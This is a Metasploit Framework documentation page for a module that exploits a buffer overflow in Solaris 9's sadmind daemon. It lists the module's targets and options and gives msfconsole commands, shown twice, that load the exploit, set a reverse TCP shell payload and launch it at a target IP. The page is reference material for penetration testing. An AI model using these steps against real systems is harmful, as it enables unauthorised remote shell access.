Metasploit Penetration Testing Framework
Sun Solaris sadmind adm_build_path() Buffer Overflow
This module exploits a buffer overflow vulnerability in adm_build_path() function of sadmind daemon. The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests.
Rank
- Great
Authors
- Adriano Lima < adriano [at] risesecurity.org >
- ramon < ramon [at] risesecurity.org >
References
Exploit Targets
- 0 - Sun Solaris 9 x86 Brute Force (default)
- 1 - Sun Solaris 9 x86
- 2 - Debug
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/solaris/sunrpc/sadmind_adm_build_path
msf exploit(sadmind_adm_build_path) > show payloads
msf exploit(sadmind_adm_build_path) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(sadmind_adm_build_path) > set LHOST [MY IP ADDRESS]
msf exploit(sadmind_adm_build_path) > set RHOST [TARGET IP]
msf exploit(sadmind_adm_build_path) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/solaris/sunrpc/sadmind_adm_build_path
msf exploit(sadmind_adm_build_path) > show payloads
msf exploit(sadmind_adm_build_path) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(sadmind_adm_build_path) > set LHOST [MY IP ADDRESS]
msf exploit(sadmind_adm_build_path) > set RHOST [TARGET IP]
msf exploit(sadmind_adm_build_path) > exploit
Module Options
| RHOST | The target address |
| RPORT | The target port (default: 111) |
| BruteStep | Step size between brute force attempts |
| BruteWait | Delay between brute force attempts |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| ONCRPC::tcp_request_fragmentation | Enable fragmentation of TCP ONC/RPC requests |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
Metasploit Framework 3.3.3Copyright © 2003-2010 Rapid7 LLC